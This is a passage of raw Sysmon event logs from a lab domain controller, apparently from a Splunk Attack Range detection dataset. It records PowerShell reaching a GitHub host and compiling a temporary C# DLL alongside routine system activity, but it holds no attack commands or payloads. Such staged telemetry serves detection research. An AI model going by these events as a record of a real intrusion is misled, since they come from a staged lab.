Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19CA69E31ACE5B5EBE1A3FEF7A2D0960,SHA256=E3BB04243EF9BCD9C50C94AF71EE4C85C347465D66DB2877D6A93A8085B1D7A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000023693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.247{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57153- 354300x800000000000000023692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.103{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61464-false192.30.255.112lb-192-30-255-112-sea.github.com443https 10341000x800000000000000023691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-DA05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.139{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD3E863926024690A775CDF736430E6E,SHA256=67574E16BD97310095698C6E5B14C28E96C568D88ECA9E89082C1B1955A83D12,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.139{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-DA05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.139{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-DA05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.123{4DB9351A-A285-60D3-D905-00000000CF01}6384NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J08HG89IBX\System.IO.Log.ni.dll.auxMD5=5AA109F9E8FFA1F4B9773DFF8E35F2A8,SHA256=22F11C73B6A1D7DEB1416FB11763EB58491C8814A01EEC3AC7A7021524FBB83D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.123{4DB9351A-A285-60D3-D905-00000000CF01}6384NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J08HG89IBX\System.IO.Log.ni.dllMD5=DE0B0F09F4B529EFE36F27AB94390190,SHA256=38610F328B43D386E73BD1FFF30DA92A25B02D0816EB4B1A3BBBE0D81318F934,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-D905-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.108{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdlineMD5=41EB38BB5EE1ABE75910874C4F4FA696,SHA256=417D873754B5D33FB083E090894FB518664FBD3C7CD1D314630CFD7AC68D3841,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.108{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.0.csMD5=A29444398AC9A819C5D208948B81A14C,SHA256=F447865E0C75B6C39BECAB9B9527FCC583DEF24C18A66CC815A9419F375DDC11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dllMD5=CD8B2B57BE99272F96086E7E94667335,SHA256=85CC942A216A9DAC316679338C72BDD4CE2404D662B3ADC50964EEF35EB20683,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000023681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.outMD5=58AE0BBFF884B6220A49DB74517619A9,SHA256=5022643F7533EEEF0177CAED5C483FB29742983A8683FB98B63A93157A7912FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\CSCCD4895C0D4A94362BF65B1CDDBE456E3.TMPMD5=4C368B1F62BCAB7C276943BB71D7B522,SHA256=F67DE663269E6BEAB900B2FD7F97C19FFFAD599211195BC32B0CAA8731CFC06D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dll2021-06-23 21:07:16.920 23542300x800000000000000023678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES4723.tmpMD5=A7189997D0A68EF5882E74791FA45482,SHA256=D696DC6EEABEB28323CB106F0843E1B8F47D2D91CDBAC2F03092B96CC379B0AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D905-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-D905-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A285-60D3-D805-00000000CF01}6232ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES4723.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A285-60D3-D705-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMM8YZHY6Z\System.IO.Compression.FileSystem.ni.dll.auxMD5=CFE0B80EA02CDC33A7834593D270A12E,SHA256=D9BC5BD28106A8E54A036EA947C7FA24D319A3012F751176D35A9406E728B630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A285-60D3-D705-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMM8YZHY6Z\System.IO.Compression.FileSystem.ni.dllMD5=A62C8A9ADFBB0A623E09F15F91038F24,SHA256=8922BEAEA7E9B3943AD9C6351FBD52887F5459187B0D872D57C0BFF34825FB5D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A284-60D3-D405-00000000CF01}6900584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000023664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.080{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES4723.tmp" "c:\Users\Administrator\AppData\Local\Temp\k4y1undg\CSCCD4895C0D4A94362BF65B1CDDBE456E3.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdline" 10341000x800000000000000023663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.061{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-D705-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.045{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D705-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.045{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-D705-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 